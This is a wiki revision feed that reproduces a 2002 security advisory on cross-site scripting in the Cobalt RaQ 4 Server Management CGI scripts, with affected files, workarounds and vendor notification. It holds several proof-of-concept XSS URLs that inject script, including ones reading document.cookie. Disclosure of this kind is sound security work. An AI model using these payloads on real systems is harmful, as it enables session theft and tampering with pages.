<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0346_Cobalt_RAQ_4_Server_XSS%E4%BB%BB%E6%84%8F%E8%85%B3%E6%9C%AC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2002-0346 Cobalt RAQ 4 Server XSS任意腳本執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0346_Cobalt_RAQ_4_Server_XSS%E4%BB%BB%E6%84%8F%E8%85%B3%E6%9C%AC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0346_Cobalt_RAQ_4_Server_XSS%E4%BB%BB%E6%84%8F%E8%85%B3%E6%9C%AC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T03:17:21Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2002-0346_Cobalt_RAQ_4_Server_XSS%E4%BB%BB%E6%84%8F%E8%85%B3%E6%9C%AC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=800&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal &amp; DoS Vulnerabilities. ------oOo----------------   Company...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0346_Cobalt_RAQ_4_Server_XSS%E4%BB%BB%E6%84%8F%E8%85%B3%E6%9C%AC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=800&amp;oldid=prev"/>
		<updated>2021-03-31T07:14:58Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal &amp;amp; DoS Vulnerabilities. ------oOo----------------   Company...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
------oOo----------------&lt;br /&gt;
Cobalt RAQ 4 Server Management,&lt;br /&gt;
Cross Site Scripting , Directory Traversal &amp;amp; DoS Vulnerabilities.&lt;br /&gt;
------oOo----------------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Company Affected: www.cobalt.com &amp;amp; www.sun.com&lt;br /&gt;
Version: RAQ 4 Server Management.&lt;br /&gt;
Dowload: http://www.cobalt.com/products/raq/index.html&lt;br /&gt;
OS Affected: Linux ALL, Solaris ALL.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Author:&lt;br /&gt;
&lt;br /&gt;
** Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt;&lt;br /&gt;
** Thanks all the people from Spain and Argentina.&lt;br /&gt;
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----=[Brief Description]=------------&lt;br /&gt;
&lt;br /&gt;
The Sun Cobalt RaQ is a server appliance for Internet Service Providers&lt;br /&gt;
(ISPs). &lt;br /&gt;
It can host up to 200 individual websites or it can be dedicated to a&lt;br /&gt;
single medium or large customer. This versatility opens up tremendous &lt;br /&gt;
opportunity for service provider to invest in a single piece of hardware &lt;br /&gt;
while migrating business customers up to dedicated servers.&lt;br /&gt;
&lt;br /&gt;
Cobalt's service.cgi incorrectly handles the incoming search parses,&lt;br /&gt;
incoming HTML tags or JavaScript will be included inside the result without &lt;br /&gt;
them being filtered out for dangerous content. A similar problem occurs with &lt;br /&gt;
the x.cgi's inclusion of malicious code inside the resulting title search.&lt;br /&gt;
&lt;br /&gt;
The cgi^s files is an open source .A security vulnerability in the&lt;br /&gt;
product allows attackers to insert malicious content into existing web pages by&lt;br /&gt;
exploiting the Cross-Site Scripting Vulnerability.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Affected Files Cgi^s&lt;br /&gt;
&lt;br /&gt;
alert.cgi  &lt;br /&gt;
service.cgi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Workaround:&lt;br /&gt;
1) Delete service.cgi from the system, or disable its possible&lt;br /&gt;
execution.&lt;br /&gt;
2) Delete alert.cgi from the system, or disable its possible execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
EXAMPLES:&lt;br /&gt;
&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;h1&amp;gt;Hello!&amp;lt;/h1&amp;gt;&amp;lt;script&amp;gt;alert('hello')&amp;lt;/script&amp;gt;&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('Microsoft%20hole')&amp;lt;/script&amp;gt;&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert(document.domain)&amp;gt;&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
LOCATION:&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E&lt;br /&gt;
&lt;br /&gt;
COOKIES:&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E&lt;br /&gt;
&lt;br /&gt;
TAG IMAGES:&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert(document.domain)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
WRITE ON DOCUMENT:&lt;br /&gt;
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=&amp;lt;SCRIPT&amp;gt;document.write(document.domain)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Response:&lt;br /&gt;
The vendor was notified&lt;br /&gt;
&lt;br /&gt;
Posted List^s Security cobalt:&lt;br /&gt;
cobalt-security@list.cobalt.com &amp;amp;&lt;br /&gt;
jlovell@sun.com&lt;br /&gt;
&lt;br /&gt;
http://www.cobalt.com&lt;br /&gt;
Patch Temporary: &lt;br /&gt;
Delete files cgi^s from the system, or disable its &lt;br /&gt;
possible execution.&lt;br /&gt;
&lt;br /&gt;
Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (c) 2002.&lt;br /&gt;
&lt;br /&gt;
------oOo------------------------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>